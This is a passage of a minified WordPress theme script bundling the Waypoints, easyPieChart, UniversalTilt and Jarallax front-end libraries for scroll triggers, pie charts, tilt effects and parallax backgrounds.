File: //proc/thread-self/root/home/parhudrw/anqa.it/wp-content/themes/essentials/js/essentials.min.js
"undefined"==typeof $&&"undefined"!=jQuery&&($=jQuery),function(){"use strict";function t(n){if(!n)throw new Error("No options passed to Waypoint constructor");if(!n.element)throw new Error("No element option passed to Waypoint constructor");if(!n.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,n),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=n.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),i[this.key]=this,e+=1}var e=0,i={};t.prototype.queueTrigger=function(t){this.group.queueTrigger(this,t)},t.prototype.trigger=function(t){this.enabled&&this.callback&&this.callback.apply(this,t)},t.prototype.destroy=function(){this.context.remove(this),this.group.remove(this),delete i[this.key]},t.prototype.disable=function(){return this.enabled=!1,this},t.prototype.enable=function(){return this.context.refresh(),this.enabled=!0,this},t.prototype.next=function(){return this.group.next(this)},t.prototype.previous=function(){return this.group.previous(this)},t.invokeAll=function(t){var e=[];for(var n in i)e.push(i[n]);for(var o=0,a=e.length;a>o;o++)e[o][t]()},t.destroyAll=function(){t.invokeAll("destroy")},t.disableAll=function(){t.invokeAll("disable")},t.enableAll=function(){for(var e in t.Context.refreshAll(),i)i[e].enabled=!0;return this},t.refreshAll=function(){t.Context.refreshAll()},t.viewportHeight=function(){return window.innerHeight||document.documentElement.clientHeight},t.viewportWidth=function(){return document.documentElement.clientWidth},t.adapters=[],t.defaults={context:window,continuous:!0,enabled:!0,group:"default",horizontal:!1,offset:0},t.offsetAliases={"bottom-in-view":function(){return this.context.innerHeight()-this.adapter.outerHeight()},"right-in-view":function(){return this.context.innerWidth()-this.adapter.outerWidth()}},window.Waypoint=t}(),function(){"use strict";function t(t){window.setTimeout(t,1e3/60)}function e(t){this.element=t,this.Adapter=o.Adapter,this.adapter=new this.Adapter(t),this.key="waypoint-context-"+i,this.didScroll=!1,this.didResize=!1,this.oldScroll={x:this.adapter.scrollLeft(),y:this.adapter.scrollTop()},this.waypoints={vertical:{},horizontal:{}},t.waypointContextKey=this.key,n[t.waypointContextKey]=this,i+=1,o.windowContext||(o.windowContext=!0,o.windowContext=new e(window)),this.createThrottledScrollHandler(),this.createThrottledResizeHandler()}var i=0,n={},o=window.Waypoint,a=window.onload;e.prototype.add=function(t){var e=t.options.horizontal?"horizontal":"vertical";this.waypoints[e][t.key]=t,this.refresh()},e.prototype.checkEmpty=function(){var t=this.Adapter.isEmptyObject(this.waypoints.horizontal),e=this.Adapter.isEmptyObject(this.waypoints.vertical),i=this.element==this.element.window;t&&e&&!i&&(this.adapter.off(".waypoints"),delete n[this.key])},e.prototype.createThrottledResizeHandler=function(){function t(){e.handleResize(),e.didResize=!1}var e=this;this.adapter.on("resize.waypoints",function(){e.didResize||(e.didResize=!0,o.requestAnimationFrame(t))})},e.prototype.createThrottledScrollHandler=function(){function t(){e.handleScroll(),e.didScroll=!1}var e=this;this.adapter.on("scroll.waypoints",function(){(!e.didScroll||o.isTouch)&&(e.didScroll=!0,o.requestAnimationFrame(t))})},e.prototype.handleResize=function(){o.Context.refreshAll()},e.prototype.handleScroll=function(){var t={},e={horizontal:{newScroll:this.adapter.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.adapter.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};for(var i in e){var n=e[i],o=n.newScroll>n.oldScroll?n.forward:n.backward;for(var a in this.waypoints[i]){var s=this.waypoints[i][a];if(null!==s.triggerPoint){var r=n.oldScroll<s.triggerPoint,l=n.newScroll>=s.triggerPoint;(r&&l||!r&&!l)&&(s.queueTrigger(o),t[s.group.id]=s.group)}}}for(var d in t)t[d].flushTriggers();this.oldScroll={x:e.horizontal.newScroll,y:e.vertical.newScroll}},e.prototype.innerHeight=function(){return this.element==this.element.window?o.viewportHeight():this.adapter.innerHeight()},e.prototype.remove=function(t){delete this.waypoints[t.axis][t.key],this.checkEmpty()},e.prototype.innerWidth=function(){return this.element==this.element.window?o.viewportWidth():this.adapter.innerWidth()},e.prototype.destroy=function(){var t=[];for(var e in this.waypoints)for(var i in this.waypoints[e])t.push(this.waypoints[e][i]);for(var n=0,o=t.length;o>n;n++)t[n].destroy()},e.prototype.refresh=function(){var t,e=this.element==this.element.window,i=e?void 0:this.adapter.offset(),n={};for(var a in this.handleScroll(),t={horizontal:{contextOffset:e?0:i.left,contextScroll:e?0:this.oldScroll.x,contextDimension:this.innerWidth(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:e?0:i.top,contextScroll:e?0:this.oldScroll.y,contextDimension:this.innerHeight(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}}){var s=t[a];for(var r in this.waypoints[a]){var l,d,c,p,u=this.waypoints[a][r],h=u.options.offset,f=u.triggerPoint,m=0,y=null==f;u.element!==u.element.window&&(m=u.adapter.offset()[s.offsetProp]),"function"==typeof h?h=h.apply(u):"string"==typeof h&&(h=parseFloat(h),u.options.offset.indexOf("%")>-1&&(h=Math.ceil(s.contextDimension*h/100))),l=s.contextScroll-s.contextOffset,u.triggerPoint=Math.floor(m+l-h),d=f<s.oldScroll,c=u.triggerPoint>=s.oldScroll,p=!d&&!c,!y&&(d&&c)?(u.queueTrigger(s.backward),n[u.group.id]=u.group):!y&&p?(u.queueTrigger(s.forward),n[u.group.id]=u.group):y&&s.oldScroll>=u.triggerPoint&&(u.queueTrigger(s.forward),n[u.group.id]=u.group)}}return o.requestAnimationFrame(function(){for(var t in n)n[t].flushTriggers()}),this},e.findOrCreateByElement=function(t){return e.findByElement(t)||new e(t)},e.refreshAll=function(){for(var t in n)n[t].refresh()},e.findByElement=function(t){return n[t.waypointContextKey]},window.onload=function(){a&&a(),e.refreshAll()},o.requestAnimationFrame=function(e){(window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||t).call(window,e)},o.Context=e}(),function(){"use strict";function t(t,e){return t.triggerPoint-e.triggerPoint}function e(t,e){return e.triggerPoint-t.triggerPoint}function i(t){this.name=t.name,this.axis=t.axis,this.id=this.name+"-"+this.axis,this.waypoints=[],this.clearTriggerQueues(),n[this.axis][this.name]=this}var n={vertical:{},horizontal:{}},o=window.Waypoint;i.prototype.add=function(t){this.waypoints.push(t)},i.prototype.clearTriggerQueues=function(){this.triggerQueues={up:[],down:[],left:[],right:[]}},i.prototype.flushTriggers=function(){for(var i in this.triggerQueues){var n=this.triggerQueues[i],o="up"===i||"left"===i;n.sort(o?e:t);for(var a=0,s=n.length;s>a;a+=1){var r=n[a];(r.options.continuous||a===n.length-1)&&r.trigger([i])}}this.clearTriggerQueues()},i.prototype.next=function(e){this.waypoints.sort(t);var i=o.Adapter.inArray(e,this.waypoints);return i===this.waypoints.length-1?null:this.waypoints[i+1]},i.prototype.previous=function(e){this.waypoints.sort(t);var i=o.Adapter.inArray(e,this.waypoints);return i?this.waypoints[i-1]:null},i.prototype.queueTrigger=function(t,e){this.triggerQueues[e].push(t)},i.prototype.remove=function(t){var e=o.Adapter.inArray(t,this.waypoints);e>-1&&this.waypoints.splice(e,1)},i.prototype.first=function(){return this.waypoints[0]},i.prototype.last=function(){return this.waypoints[this.waypoints.length-1]},i.findOrCreate=function(t){return n[t.axis][t.name]||new i(t)},o.Group=i}(),function(){"use strict";function t(t){this.$element=e(t)}var e=window.jQuery,i=window.Waypoint;e.each(["innerHeight","innerWidth","off","offset","on","outerHeight","outerWidth","scrollLeft","scrollTop"],function(e,i){t.prototype[i]=function(){var t=Array.prototype.slice.call(arguments);return this.$element[i].apply(this.$element,t)}}),e.each(["extend","inArray","isEmptyObject"],function(i,n){t[n]=e[n]}),i.adapters.push({name:"jquery",Adapter:t}),i.Adapter=t}(),function(){"use strict";function t(t){return function(){var i=[],n=arguments[0];return t.isFunction(arguments[0])&&((n=t.extend({},arguments[1])).handler=arguments[0]),this.each(function(){var o=t.extend({},n,{element:this});"string"==typeof o.context&&(o.context=t(this).closest(o.context)[0]),i.push(new e(o))}),i}}var e=window.Waypoint;window.jQuery&&(window.jQuery.fn.waypoint=t(window.jQuery)),window.Zepto&&(window.Zepto.fn.waypoint=t(window.Zepto))}(),function(t,e){"function"==typeof define&&define.amd?define(["jquery"],function(t){return e(t)}):"object"==typeof exports?module.exports=e(require("jquery")):e(jQuery)}(0,function(t){var e=function(t,e){var i,n=document.createElement("canvas");t.appendChild(n),"object"==typeof G_vmlCanvasManager&&G_vmlCanvasManager.initElement(n);var o=n.getContext("2d");n.width=n.height=e.size;var a=1;window.devicePixelRatio>1&&(a=window.devicePixelRatio,n.style.width=n.style.height=[e.size,"px"].join(""),n.width=n.height=e.size*a,o.scale(a,a)),o.translate(e.size/2,e.size/2),o.rotate((e.rotate/180-.5)*Math.PI);var s=(e.size-e.lineWidth)/2;e.scaleColor&&e.scaleLength&&(s-=e.scaleLength+2),Date.now=Date.now||function(){return+new Date};var r=function(t,e,i){var n=0>=(i=Math.min(Math.max(-1,i||0),1));o.beginPath(),o.arc(0,0,s,0,2*Math.PI*i,n),o.strokeStyle=t,o.lineWidth=e,o.stroke()},l=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(t){window.setTimeout(t,1e3/60)},d=function(){e.scaleColor&&function(){var t,i;o.lineWidth=1,o.fillStyle=e.scaleColor,o.save();for(var n=24;n>0;--n)n%6==0?(i=e.scaleLength,t=0):(i=.6*e.scaleLength,t=e.scaleLength-i),o.fillRect(-e.size/2+t,0,i,1),o.rotate(Math.PI/12);o.restore()}(),e.trackColor&&r(e.trackColor,e.trackWidth||e.lineWidth,1)};this.getCanvas=function(){return n},this.getCtx=function(){return o},this.clear=function(){o.clearRect(e.size/-2,e.size/-2,e.size,e.size)},this.draw=function(t){var n;e.scaleColor||e.trackColor?o.getImageData&&o.putImageData?i?o.putImageData(i,0,0):(d(),i=o.getImageData(0,0,e.size*a,e.size*a)):(this.clear(),d()):this.clear(),o.lineCap=e.lineCap,n="function"==typeof e.barColor?e.barColor(t):e.barColor,r(n,e.lineWidth,t/100)}.bind(this),this.animate=function(t,i){var n=Date.now();e.onStart(t,i);var o=function(){var a=Math.min(Date.now()-n,e.animate.duration),s=e.easing(this,a,t,i-t,e.animate.duration);this.draw(s),e.onStep(t,i,s),a>=e.animate.duration?e.onStop(t,i):l(o)}.bind(this);l(o)}.bind(this)},i=function(t,i){var n={barColor:"#ef1e25",trackColor:"#f9f9f9",scaleColor:"#dfe0e0",scaleLength:5,lineCap:"round",lineWidth:3,trackWidth:void 0,size:110,rotate:0,animate:{duration:1e3,enabled:!0},easing:function(t,e,i,n,o){return 1>(e/=o/2)?n/2*e*e+i:-n/2*(--e*(e-2)-1)+i},onStart:function(t,e){},onStep:function(t,e,i){},onStop:function(t,e){}};if(void 0!==e)n.renderer=e;else{if("undefined"==typeof SVGRenderer)throw new Error("Please load either the SVG- or the CanvasRenderer");n.renderer=SVGRenderer}var o={},a=0,s=function(){for(var e in this.el=t,this.options=o,n)n.hasOwnProperty(e)&&(o[e]=i&&void 0!==i[e]?i[e]:n[e],"function"==typeof o[e]&&(o[e]=o[e].bind(this)));"string"==typeof o.easing&&"undefined"!=typeof jQuery&&jQuery.isFunction(jQuery.easing[o.easing])?o.easing=jQuery.easing[o.easing]:o.easing=n.easing,"number"==typeof o.animate&&(o.animate={duration:o.animate,enabled:!0}),"boolean"!=typeof o.animate||o.animate||(o.animate={duration:1e3,enabled:o.animate}),this.renderer=new o.renderer(t,o),this.renderer.draw(a),t.dataset&&t.dataset.percent?this.update(parseFloat(t.dataset.percent)):t.getAttribute&&t.getAttribute("data-percent")&&this.update(parseFloat(t.getAttribute("data-percent")))}.bind(this);this.update=function(t){return t=parseFloat(t),o.animate.enabled?this.renderer.animate(a,t):this.renderer.draw(t),a=t,this}.bind(this),this.disableAnimation=function(){return o.animate.enabled=!1,this},this.enableAnimation=function(){return o.animate.enabled=!0,this},s()};t.fn.easyPieChart=function(e){return this.each(function(){var n;t.data(this,"easyPieChart")||(n=t.extend({},e,t(this).data()),t.data(this,"easyPieChart",new i(this,n)))})}}),function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("UniversalTilt",[],e):"object"==typeof exports?exports.UniversalTilt=e():t.UniversalTilt=e()}("object"!=typeof window?global.window=global:window,function(){return function(t){var e={};function i(n){if(e[n])return e[n].exports;var o=e[n]={i:n,l:!1,exports:{}};return t[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=t,i.c=e,i.d=function(t,e,n){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},i.t=function(t,e){if(1&e&&(t=i(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)i.d(n,o,function(e){return t[e]}.bind(null,o));return n},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},i.p="",i(i.s=0)}([function(t,e,i){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var n,o=(n=i(1))&&n.__esModule?n:{default:n},a=o.default;e.default=a,e.default=o.default,t.exports=e.default},function(t,e,i){"use strict";function n(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var o=function(){function t(e){var i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};!function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}(this,t),e.length>0?this.init(e,i):0!==e.length&&(this.element=e,this.settings=this.settings(i),this.reverse=this.settings.reverse?-1:1,this.settings.shine&&this.shine(),this.element.style.transform="perspective(".concat(this.settings.perspective,"px)"),this.addEventListeners())}var e,i;return e=t,(i=[{key:"init",value:function(e,i){var n=!0,o=!1,a=void 0;try{for(var s,r=e[Symbol.iterator]();!(n=(s=r.next()).done);n=!0){var l=s.value;this.universalTilt=new t(l,i)}}catch(t){o=!0,a=t}finally{try{n||null==r.return||r.return()}finally{if(o)throw a}}}},{key:"isMobile",value:function(){if(window.DeviceMotionEvent&&"ontouchstart"in document.documentElement)return!0}},{key:"addEventListeners",value:function(){var t=this;navigator.userAgent.match(this.settings.exclude)||(this.isMobile()?window.addEventListener("devicemotion",function(e){return t.onDeviceMove(e)}):("element"===this.settings["position-base"]?this.base=this.element:"window"===this.settings["position-base"]&&(this.base=window),this.base.addEventListener("mouseenter",function(){return t.onMouseEnter()}),this.base.addEventListener("mousemove",function(e){return t.onMouseMove(e)}),this.base.addEventListener("mouseleave",function(){return t.onMouseLeave()})))}},{key:"onMouseEnter",value:function(){this.updateElementPosition(),this.transitions(),"function"==typeof this.settings.onMouseEnter&&this.settings.onMouseEnter(this.element)}},{key:"onMouseMove",value:function(t){var e=this;this.event=t,this.updateElementPosition(),window.requestAnimationFrame(function(){return e.update()}),"function"==typeof this.settings.onMouseMove&&this.settings.onMouseMove(this.element)}},{key:"onMouseLeave",value:function(){var t=this;this.transitions(),window.requestAnimationFrame(function(){return t.reset()}),"function"==typeof this.settings.onMouseLeave&&this.settings.onMouseLeave(this.element)}},{key:"onDeviceMove",value:function(t){this.event=t,this.update(),this.updateElementPosition(),this.transitions(),"function"==typeof this.settings.onDeviceMove&&this.settings.onDeviceMove(this.element)}},{key:"reset",value:function(){this.event={pageX:this.left+this.width/2,pageY:this.top+this.height/2},this.settings.reset&&(this.element.style.transform="perspective(".concat(this.settings.perspective,"px) rotateX(0deg) rotateY(0deg) scale3d(1, 1, 1)")),this.settings.shine&&!this.settings["shine-save"]&&Object.assign(this.shineElement.style,{transform:"rotate(180deg) translate3d(-50%, -50%, 0)",opacity:"0"})}},{key:"getValues",value:function(){var t,e,i;this.isMobile()?(t=this.event.accelerationIncludingGravity.x/4,e=this.event.accelerationIncludingGravity.y/4,90===window.orientation?(i=(1-e)/2,e=(1+t)/2,t=i):-90===window.orientation?(i=(1+e)/2,e=(1-t)/2,t=i):0===window.orientation?(e=i=(1+e)/2,t=(1+t)/2):180===window.orientation&&(e=i=(1-e)/2,t=(1-t)/2)):"element"===this.settings["position-base"]?(t=(this.event.clientX-this.left)/this.width,e=(this.event.clientY-this.top)/this.height):"window"===this.settings["position-base"]&&(t=this.event.clientX/window.innerWidth,e=this.event.clientY/window.innerHeight),t=Math.min(Math.max(t,0),1),e=Math.min(Math.max(e,0),1);var n=(this.settings.max/2-t*this.settings.max).toFixed(2),o=(e*this.settings.max-this.settings.max/2).toFixed(2),a=Math.atan2(t-.5,.5-e)*(180/Math.PI);return{tiltX:this.reverse*n,tiltY:this.reverse*o,angle:a}}},{key:"updateElementPosition",value:function(){var t=this.element.getBoundingClientRect();this.width=this.element.offsetWidth,this.height=this.element.offsetHeight,this.left=t.left,this.top=t.top}},{key:"update",value:function(){var t=this.getValues();this.element.style.transform="perspective(".concat(this.settings.perspective,"px)\n rotateX(").concat(this.settings.disabled&&"X"===this.settings.disabled.toUpperCase()?0:t.tiltY,"deg)\n rotateY(").concat(this.settings.disabled&&"Y"===this.settings.disabled.toUpperCase()?0:t.tiltX,"deg)\n scale3d(").concat(this.settings.scale,", ").concat(this.settings.scale,", ").concat(this.settings.scale,")"),this.settings.shine&&Object.assign(this.shineElement.style,{transform:"rotate(".concat(t.angle,"deg) translate3d(-50%, -50%, 0)"),opacity:"".concat(this.settings["shine-opacity"])}),this.element.dispatchEvent(new CustomEvent("tiltChange",{detail:t}))}},{key:"shine",value:function(){var t=document.createElement("div"),e=document.createElement("div");t.classList.add("shine"),e.classList.add("shine-inner"),t.appendChild(e),this.element.appendChild(t),this.shineWrapper=this.element.querySelector(".shine"),this.shineElement=this.element.querySelector(".shine-inner"),Object.assign(this.shineWrapper.style,{position:"absolute",top:"0",left:"0",height:"100%",width:"100%",overflow:"hidden"}),Object.assign(this.shineElement.style,{position:"absolute",top:"50%",left:"50%","pointer-events":"none","background-image":"linear-gradient(0deg, rgba(255,255,255,0) 0%, rgba(255,255,255,1) 100%)",width:"".concat(2*this.element.offsetWidth,"px"),height:"".concat(2*this.element.offsetWidth,"px"),transform:"rotate(180deg) translate3d(-50%, -50%, 0)","transform-origin":"0% 0%",opacity:"0"})}},{key:"transitions",value:function(){var t=this;clearTimeout(this.timeout),this.element.style.transition="all ".concat(this.settings.speed,"ms ").concat(this.settings.easing),this.settings.shine&&(this.shineElement.style.transition="opacity ".concat(this.settings.speed,"ms ").concat(this.settings.easing)),this.timeout=setTimeout(function(){t.element.style.transition="",t.settings.shine&&(t.shineElement.style.transition="")},this.settings.speed)}},{key:"settings",value:function(t){var e={"position-base":"element",reset:!0,exclude:null,shine:!1,"shine-opacity":0,"shine-save":!1,max:35,perspective:1e3,scale:1,disabled:null,reverse:!1,speed:300,easing:"cubic-bezier(.03, .98, .52, .99)",onMouseEnter:null,onMouseMove:null,onMouseLeave:null,onDeviceMove:null},i={};for(var n in e)if(n in t)i[n]=t[n];else if(this.element.getAttribute("data-".concat(n))){var o=this.element.getAttribute("data-".concat(n));try{i[n]=JSON.parse(o)}catch(t){i[n]=o}}else i[n]=e[n];return i}}])&&n(e.prototype,i),t}();if(e.default=o,"undefined"!=typeof document){var a=document.querySelectorAll("[data-tilt]");a.length&&new o(a)}window.jQuery&&(window.jQuery.fn.universalTilt=function(t){new o(this,t)})}])}),function(t){var e={};function i(n){if(e[n])return e[n].exports;var o=e[n]={i:n,l:!1,exports:{}};return t[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}i.m=t,i.c=e,i.d=function(t,e,n){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},i.t=function(t,e){if(1&e&&(t=i(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)i.d(n,o,function(e){return t[e]}.bind(null,o));return n},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},i.p="",i(i.s=10)}([,,function(t,e){t.exports=function(t){"complete"===document.readyState||"interactive"===document.readyState?t.call():document.attachEvent?document.attachEvent("onreadystatechange",function(){"interactive"===document.readyState&&t.call()}):document.addEventListener&&document.addEventListener("DOMContentLoaded",t)}},function(t,e,i){(function(e){var i="undefined"!=typeof window?window:void 0!==e?e:"undefined"!=typeof self?self:{};t.exports=i}).call(this,i(4))},function(t,e){function i(t){return(i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var n=function(){return this}();try{n=n||new Function("return this")()}catch(t){"object"===("undefined"==typeof window?"undefined":i(window))&&(n=window)}t.exports=n},,,,,,function(t,e,i){t.exports=i(11)},function(t,e,i){"use strict";i.r(e);var n=i(2),o=i.n(n),a=i(3),s=i(12);function r(t){return(r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var l,d,c=a.window.jarallax;a.window.jarallax=s.default,a.window.jarallax.noConflict=function(){return a.window.jarallax=c,this},void 0!==a.jQuery&&((l=function(){for(var t=arguments.length,e=new Array(t),i=0;i<t;i++)e[i]=arguments[i];Array.prototype.unshift.call(e,this);var n=s.default.apply(a.window,e);return"object"!==r(n)?n:this}).constructor=s.default.constructor,d=a.jQuery.fn.jarallax,a.jQuery.fn.jarallax=l,a.jQuery.fn.jarallax.noConflict=function(){return a.jQuery.fn.jarallax=d,this}),o()(function(){Object(s.default)(document.querySelectorAll("[data-jarallax]"))})},function(t,e,i){"use strict";i.r(e);var n=i(2),o=i.n(n),a=i(3);function s(t,e){return function(t){if(Array.isArray(t))return t}(t)||function(t,e){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(t)){var i=[],n=!0,o=!1,a=void 0;try{for(var s,r=t[Symbol.iterator]();!(n=(s=r.next()).done)&&(i.push(s.value),!e||i.length!==e);n=!0);}catch(t){o=!0,a=t}finally{try{n||null==r.return||r.return()}finally{if(o)throw a}}return i}}(t,e)||function(t,e){if(t){if("string"==typeof t)return r(t,e);var i=Object.prototype.toString.call(t).slice(8,-1);return"Object"===i&&t.constructor&&(i=t.constructor.name),"Map"===i||"Set"===i?Array.from(t):"Arguments"===i||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(i)?r(t,e):void 0}}(t,e)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function r(t,e){(null==e||e>t.length)&&(e=t.length);for(var i=0,n=new Array(e);i<e;i++)n[i]=t[i];return n}function l(t){return(l="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function d(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}var c,p,u=a.window.navigator,h=-1<u.userAgent.indexOf("MSIE ")||-1<u.userAgent.indexOf("Trident/")||-1<u.userAgent.indexOf("Edge/"),f=/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(u.userAgent),m=function(){for(var t="transform WebkitTransform MozTransform".split(" "),e=document.createElement("div"),i=0;i<t.length;i+=1)if(e&&void 0!==e.style[t[i]])return t[i];return!1}();function y(){p=f?(!c&&document.body&&((c=document.createElement("div")).style.cssText="position: fixed; top: -9999px; left: 0; height: 100vh; width: 0;",document.body.appendChild(c)),(c?c.clientHeight:0)||a.window.innerHeight||document.documentElement.clientHeight):a.window.innerHeight||document.documentElement.clientHeight}y(),a.window.addEventListener("resize",y),a.window.addEventListener("orientationchange",y),a.window.addEventListener("load",y),o()(function(){y()});var g=[];function v(){g.length&&(g.forEach(function(t,e){var i=t.instance,n=t.oldData,o=i.$item.getBoundingClientRect(),s={width:o.width,height:o.height,top:o.top,bottom:o.bottom,wndW:a.window.innerWidth,wndH:p},r=!n||n.wndW!==s.wndW||n.wndH!==s.wndH||n.width!==s.width||n.height!==s.height,l=r||!n||n.top!==s.top||n.bottom!==s.bottom;g[e].oldData=s,r&&i.onResize(),l&&i.onScroll()}),a.window.requestAnimationFrame(v))}function b(t,e){("object"===("undefined"==typeof HTMLElement?"undefined":l(HTMLElement))?t instanceof HTMLElement:t&&"object"===l(t)&&null!==t&&1===t.nodeType&&"string"==typeof t.nodeName)&&(t=[t]);for(var i,n=t.length,o=0,a=arguments.length,s=new Array(2<a?a-2:0),r=2;r<a;r++)s[r-2]=arguments[r];for(;o<n;o+=1)if("object"===l(e)||void 0===e?t[o].jarallax||(t[o].jarallax=new w(t[o],e)):t[o].jarallax&&(i=t[o].jarallax[e].apply(t[o].jarallax,s)),void 0!==i)return i;return t}var x=0,w=function(){function t(e,i){!function(e,i){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this);var n=this;n.instanceID=x,x+=1,n.$item=e,n.defaults={type:"scroll",speed:.5,imgSrc:null,imgElement:".jarallax-img",imgSize:"cover",imgPosition:"50% 50%",imgRepeat:"no-repeat",keepImg:!1,elementInViewport:null,zIndex:-100,disableParallax:!1,disableVideo:!1,videoSrc:null,videoStartTime:0,videoEndTime:0,videoVolume:0,videoLoop:!0,videoPlayOnlyVisible:!0,videoLazyLoading:!0,onScroll:null,onInit:null,onDestroy:null,onCoverImage:null};var o,a,r=n.$item.dataset||{},d={};Object.keys(r).forEach(function(t){var e=t.substr(0,1).toLowerCase()+t.substr(1);e&&void 0!==n.defaults[e]&&(d[e]=r[t])}),n.options=n.extend({},n.defaults,d,i),n.pureOptions=n.extend({},n.options),Object.keys(n.options).forEach(function(t){"true"===n.options[t]?n.options[t]=!0:"false"===n.options[t]&&(n.options[t]=!1)}),n.options.speed=Math.min(2,Math.max(-1,parseFloat(n.options.speed))),"string"==typeof n.options.disableParallax&&(n.options.disableParallax=new RegExp(n.options.disableParallax)),n.options.disableParallax instanceof RegExp&&(o=n.options.disableParallax,n.options.disableParallax=function(){return o.test(u.userAgent)}),"function"!=typeof n.options.disableParallax&&(n.options.disableParallax=function(){return!1}),"string"==typeof n.options.disableVideo&&(n.options.disableVideo=new RegExp(n.options.disableVideo)),n.options.disableVideo instanceof RegExp&&(a=n.options.disableVideo,n.options.disableVideo=function(){return a.test(u.userAgent)}),"function"!=typeof n.options.disableVideo&&(n.options.disableVideo=function(){return!1});var c=n.options.elementInViewport;c&&"object"===l(c)&&void 0!==c.length&&(c=s(c,1)[0]),c instanceof Element||(c=null),n.options.elementInViewport=c,n.image={src:n.options.imgSrc||null,$container:null,useImgTag:!1,position:/iPad|iPhone|iPod|Android/.test(u.userAgent)?"absolute":"fixed"},n.initImg()&&n.canInitParallax()&&n.init()}var e,i;return e=t,(i=[{key:"css",value:function(t,e){return"string"==typeof e?a.window.getComputedStyle(t).getPropertyValue(e):(e.transform&&m&&(e[m]=e.transform),Object.keys(e).forEach(function(i){t.style[i]=e[i]}),t)}},{key:"extend",value:function(t){for(var e=arguments.length,i=new Array(1<e?e-1:0),n=1;n<e;n++)i[n-1]=arguments[n];return t=t||{},Object.keys(i).forEach(function(e){i[e]&&Object.keys(i[e]).forEach(function(n){t[n]=i[e][n]})}),t}},{key:"getWindowData",value:function(){return{width:a.window.innerWidth||document.documentElement.clientWidth,height:p,y:document.documentElement.scrollTop}}},{key:"initImg",value:function(){var t=this,e=t.options.imgElement;return e&&"string"==typeof e&&(e=t.$item.querySelector(e)),e instanceof Element||(t.options.imgSrc?(e=new Image).src=t.options.imgSrc:e=null),e&&(t.options.keepImg?t.image.$item=e.cloneNode(!0):(t.image.$item=e,t.image.$itemParent=e.parentNode),t.image.useImgTag=!0),!(!t.image.$item&&(null===t.image.src&&(t.image.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7",t.image.bgImage=t.css(t.$item,"background-image")),!t.image.bgImage||"none"===t.image.bgImage))}},{key:"canInitParallax",value:function(){return m&&!this.options.disableParallax()}},{key:"init",value:function(){var 